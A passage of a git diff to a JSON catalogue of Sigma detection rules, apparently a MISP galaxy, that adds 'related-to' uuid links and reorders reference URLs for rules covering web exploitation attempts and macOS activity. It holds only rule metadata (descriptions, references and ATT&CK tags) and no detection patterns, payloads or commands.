"3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" }, @@ -59794,9 +77184,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", - "https://swarm.ptsecurity.com/unauth-rce-vmware", "https://f5.pm/go-59627.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" ], "tags": [ @@ -59804,6 +77194,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", "value": "CVE-2021-21972 VSphere Exploitation" }, @@ -59828,6 +77227,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", "value": "Multiple Suspicious Resp Codes Caused by Single Client" }, @@ -59855,6 +77263,15 @@ "cve.2022.46169" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "738cb115-881f-4df3-82cc-56ab02fc5192", "value": "Potential CVE-2022-46169 Exploitation Attempt" }, @@ -59871,12 +77288,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" ], "tags": [ @@ -59884,6 +77301,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", "value": "Log4j RCE CVE-2021-44228 in Fields" }, @@ -59932,6 +77358,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", "value": "Pulse Secure Attack CVE-2019-11510" }, @@ -59948,10 +77383,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", - "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" ], "tags": [ @@ -59983,6 +77418,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", "value": "Exchange Exploitation CVE-2021-28480" }, @@ -60023,8 +77467,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" ], "tags": [ @@ -60033,6 +77477,15 @@ "cve.2021.2109" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "687f6504-7f44-4549-91fc-f07bab065821", "value": "Oracle WebLogic Exploit CVE-2021-2109" }, @@ -60058,6 +77511,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", "value": "Path Traversal Exploitation Attempts" }, @@ -60083,6 +77545,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", "value": "Sitecore Pre-Auth RCE CVE-2021-42237" }, @@ -60099,9 +77570,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", "https://github.com/apache/spark/pull/36315/files", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ @@ -60110,6 +77581,15 @@ "cve.2022.33891" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", "value": "Apache Spark Shell Command Injection - Weblogs" }, @@ -60126,9 +77606,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" ], "tags": [ @@ -60136,6 +77616,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", "value": "Suspicious User-Agents Related To Recon Tools" }, @@ -60161,6 +77650,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" }, @@ -60185,30 +77683,18 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", "value": "Fortinet CVE-2018-13379 Exploitation" }, - { - "description": "Detects an issue in apache logs that reports threading related errors", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/22", - "falsepositive": [ - "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" - ], - "filename": "web_apache_threading_error.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" - ], - "tags": "No established tags" - }, - "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", - "value": "Apache Threading Error" - }, { "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", "meta": { @@ -60230,6 +77716,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", "value": "Fortinet CVE-2021-22123 Exploitation" }, @@ -60256,6 +77751,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", "value": "Exchange ProxyShell Pattern" }, @@ -60297,8 +77801,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/sensepost/reGeorg", "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" ], "tags": [ @@ -60322,12 +77826,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" ], "tags": [ @@ -60335,33 +77839,18 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", "value": "Log4j RCE CVE-2021-44228 Generic" }, - { - "description": "Detects a segmentation fault error message caused by a creashing apache worker process", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/28", - "falsepositive": [ - "Unknown" - ], - "filename": "web_apache_segfault.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "http://www.securityfocus.com/infocus/1633", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ] - }, - "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", - "value": "Apache Segmentation Fault" - }, { "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", "meta": { @@ -60383,6 +77872,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", "value": "Confluence Exploitation CVE-2019-3398" }, @@ -60407,6 +77905,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", "value": "CVE-2021-33766 Exchange ProxyToken Exploitation" }, @@ -60424,8 +77931,8 @@ "logsource.product": "No established product", "refs": [ "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", - "https://www.tenable.com/security/research/tra-2021-13", "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://www.tenable.com/security/research/tra-2021-13", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" ], "tags": [ @@ -60435,6 +77942,15 @@ "cve.2021.20091" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", "value": "Arcadyan Router Exploitations" }, @@ -60461,6 +77977,15 @@ "cve.2020.28188" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", "value": "TerraMaster TOS CVE-2020-28188" }, @@ -60485,6 +78010,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" }, @@ -60501,8 +78035,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", "https://kb.vmware.com/s/article/85717", + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" ], "tags": [ @@ -60510,6 +78044,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", "value": "VMware vCenter Server File Upload CVE-2021-22005" }, @@ -60526,12 +78069,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", "https://twitter.com/bl4sty/status/1445462677824761878", + "https://twitter.com/ptswarm/status/1445376079548624899", "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", - "https://twitter.com/ptswarm/status/1445376079548624899", "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" ], "tags": [ @@ -60539,6 +78082,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", "value": "CVE-2021-41773 Exploitation Attempt" }, @@ -60567,6 +78119,15 @@ "cve.2014.6287" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", "value": "Rejetto HTTP File Server RCE" }, @@ -60584,8 +78145,8 @@ "logsource.product": "No established product", "refs": [ "https://github.com/lijiejie/IIS_shortname_Scanner", - "https://www.exploit-db.com/exploits/19525", "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://www.exploit-db.com/exploits/19525", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" ], "tags": [ @@ -60593,6 +78154,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", "value": "Successful IIS Shortname Fuzzing Scan" }, @@ -60617,6 +78187,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" }, @@ -60633,8 +78212,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" ], "tags": [ @@ -60643,6 +78222,15 @@ "cve.2020.3452" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", "value": "Cisco ASA FTD Exploit CVE-2020-3452" }, @@ -60688,6 +78276,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", "value": "CVE-2020-0688 Exchange Exploitation via Web Log" }, @@ -60729,11 +78326,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://isc.sans.edu/diary/25686", - "https://support.citrix.com/article/CTX267027", "https://support.citrix.com/article/CTX267679", - "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://support.citrix.com/article/CTX267027", + "https://isc.sans.edu/diary/25686", "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" ], "tags": [ @@ -60741,6 +78338,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", "value": "Citrix Netscaler Attack CVE-2019-19781" }, @@ -60765,6 +78371,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", "value": "CVE-2020-0688 Exploitation Attempt" }, @@ -60826,8 +78441,8 @@ "logsource.product": "No established product", "refs": [ "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" ], "tags": [ @@ -60837,6 +78452,15 @@ "attack.t1505.003" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" }, @@ -60862,6 +78486,15 @@ "attack.t1037.005" ] }, + "related": [ + { + "dest-uuid": "c0dfe7b0-b873-4618-9ff8-53e31f70907f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", "value": "Startup Items" }, @@ -60878,8 +78511,8 @@ "logsource.category": "file_event", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ @@ -60888,6 +78521,15 @@ "attack.t1546.014" ] }, + "related": [ + { + "dest-uuid": "9c45eaa3-8604-4780-8988-b5074dbb9ecd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", "value": "MacOS Emond Launch Daemon" }, @@ -60985,6 +78627,15 @@ "attack.t1059.002" ] }, + "related": [ + { + "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", "value": "MacOS Scripting Interpreter AppleScript" }, @@ -61009,6 +78660,15 @@ "attack.t1553.001" ] }, + "related": [ + { + "dest-uuid": "31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", "value": "Gatekeeper Bypass via Xattr" }, @@ -61049,8 +78709,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" ], "tags": [ @@ -61067,6 +78727,43 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "value": "Suspicious Execution via macOS Script Editor" }, @@ -61115,6 +78812,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "value": "Creation Of A Local User Account" }, @@ -61163,6 +78869,15 @@ "attack.t1564.002" ] }, + "related": [ + { + "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", "value": "Hidden User Creation" }, @@ -61188,6 +78903,15 @@ "attack.t1552.003" ] }, + "related": [ + { + "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "508a9374-ad52-4789-b568-fc358def2c65", "value": "Suspicious History File Operations" }, @@ -61212,6 +78936,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", "value": "System Network Connections Discovery - MacOs" }, @@ -61252,8 +78985,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" ], "tags": [ @@ -61300,8 +79033,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" ], @@ -61333,6 +79066,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "value": "File Time Attribute Change" }, @@ -61362,6 +79104,29 @@ "attack.s0402" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", "value": "Payload Decoded and Decrypted via Built-in Utilities" }, @@ -61410,6 +79175,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "value": "Local Groups Discovery - MacOs" }, @@ -61436,6 +79210,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": 